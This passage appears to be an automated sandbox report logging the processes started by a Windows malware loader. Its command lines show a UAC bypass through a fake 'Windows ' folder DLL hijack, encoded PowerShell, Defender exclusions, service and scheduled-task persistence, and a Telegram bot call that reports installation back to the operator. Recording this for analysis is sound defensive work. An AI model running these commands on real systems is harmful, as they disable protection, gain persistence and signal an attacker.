                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:8
                                                                                                                                                                              Start time:06:29:09
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\xcopy.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32"
                                                                                                                                                                              Imagebase:0x7ff6227a0000
                                                                                                                                                                              File size:50'688 bytes
                                                                                                                                                                              MD5 hash:39FBFD3AF58238C6F9D4D408C9251FF5
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:9
                                                                                                                                                                              Start time:06:29:09
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c move /y C:\Users\Public\pyld.dll "C:\Windows \System32\printui.dll"
                                                                                                                                                                              Imagebase:0x7ff7f7ee0000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:10
                                                                                                                                                                              Start time:06:29:12
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows \System32\printui.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows \System32\printui.exe"
                                                                                                                                                                              Imagebase:0x7ff67a0e0000
                                                                                                                                                                              File size:64'000 bytes
                                                                                                                                                                              MD5 hash:2FC3530F3E05667F8240FC77F7486E7E
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:13
                                                                                                                                                                              Start time:06:29:12
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows \System32\printui.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows \System32\printui.exe"
                                                                                                                                                                              Imagebase:0x7ff67a0e0000
                                                                                                                                                                              File size:64'000 bytes
                                                                                                                                                                              MD5 hash:2FC3530F3E05667F8240FC77F7486E7E
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:14
                                                                                                                                                                              Start time:06:29:12
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"
                                                                                                                                                                              Imagebase:0x7ff7f7ee0000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:15
                                                                                                                                                                              Start time:06:29:12
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:16
                                                                                                                                                                              Start time:06:29:12
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"
                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:18
                                                                                                                                                                              Start time:06:29:36
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
                                                                                                                                                                              Imagebase:0x7ff7f7ee0000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:19
                                                                                                                                                                              Start time:06:29:36
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:20
                                                                                                                                                                              Start time:06:29:36
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:21
                                                                                                                                                                              Start time:06:29:38
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                              Imagebase:0x7ff7e52b0000
                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:23
                                                                                                                                                                              Start time:06:29:42
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:cmd.exe /c sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat" /f && sc start x590769
                                                                                                                                                                              Imagebase:0x7ff7f7ee0000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:24
                                                                                                                                                                              Start time:06:29:42
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:25
                                                                                                                                                                              Start time:06:29:42
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
                                                                                                                                                                              Imagebase:0x7ff6c9060000
                                                                                                                                                                              File size:72'192 bytes
                                                                                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:26
                                                                                                                                                                              Start time:06:29:42
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\reg.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat" /f
                                                                                                                                                                              Imagebase:0x7ff639120000
                                                                                                                                                                              File size:77'312 bytes
                                                                                                                                                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:27
                                                                                                                                                                              Start time:06:29:42
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:sc start x590769
                                                                                                                                                                              Imagebase:0x7ff6c9060000
                                                                                                                                                                              File size:72'192 bytes
                                                                                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:28
                                                                                                                                                                              Start time:06:29:42
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k DcomLaunch
                                                                                                                                                                              Imagebase:0x7ff7e52b0000
                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:29
                                                                                                                                                                              Start time:06:29:43
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
                                                                                                                                                                              Imagebase:0x7ff7f7ee0000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:30
                                                                                                                                                                              Start time:06:29:43
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:31
                                                                                                                                                                              Start time:06:29:43
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:32
                                                                                                                                                                              Start time:06:29:44
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
                                                                                                                                                                              Imagebase:0x7ff7f7ee0000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:33
                                                                                                                                                                              Start time:06:29:44
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:34
                                                                                                                                                                              Start time:06:29:44
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\console_zero.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\System32\console_zero.exe"
                                                                                                                                                                              Imagebase:0x7ff747100000
                                                                                                                                                                              File size:664'064 bytes
                                                                                                                                                                              MD5 hash:49672519E74E8AD135DAE7345BCEFF41
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:35
                                                                                                                                                                              Start time:06:29:44
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                                                                                                              Imagebase:0x7ff7f7ee0000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:36
                                                                                                                                                                              Start time:06:29:44
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:37
                                                                                                                                                                              Start time:06:29:44
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                                                                                                              Imagebase:0x7ff7075e0000
                                                                                                                                                                              File size:235'008 bytes
                                                                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:38
                                                                                                                                                                              Start time:06:29:45
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:cmd.exe /c powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@123716: Installed success.'});"
                                                                                                                                                                              Imagebase:0x7ff7f7ee0000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:39
                                                                                                                                                                              Start time:06:29:45
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:40
                                                                                                                                                                              Start time:06:29:45
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@123716: Installed success.'});"
                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:41
                                                                                                                                                                              Start time:06:29:46
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
                                                                                                                                                                              Imagebase:0x7ff7f7ee0000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:42
                                                                                                                                                                              Start time:06:29:46
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:43
                                                                                                                                                                              Start time:06:29:46
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:44
                                                                                                                                                                              Start time:06:29:46
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\console_zero.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\console_zero.exe
                                                                                                                                                                              Imagebase:0x7ff747100000
                                                                                                                                                                              File size:664'064 bytes
                                                                                                                                                                              MD5 hash:49672519E74E8AD135DAE7345BCEFF41
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:45
                                                                                                                                                                              Start time:06:29:47
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                                                                                                              Imagebase:0x7ff7f7ee0000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:46
                                                                                                                                                                              Start time:06:29:47
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:47
                                                                                                                                                                              Start time:06:29:47
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                                                                                                              Imagebase:0x7ff7075e0000
                                                                                                                                                                              File size:235'008 bytes
                                                                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:48
                                                                                                                                                                              Start time:06:29:49
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
                                                                                                                                                                              Imagebase:0x7ff7f7ee0000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:49
                                                                                                                                                                              Start time:06:29:49
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:50
                                                                                                                                                                              Start time:06:29:49
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionPath 'E:\'
                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:51
                                                                                                                                                                              Start time:06:29:53
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
                                                                                                                                                                              Imagebase:0x7ff7f7ee0000
                                                                                                                                                                              File size:289'792 bytes
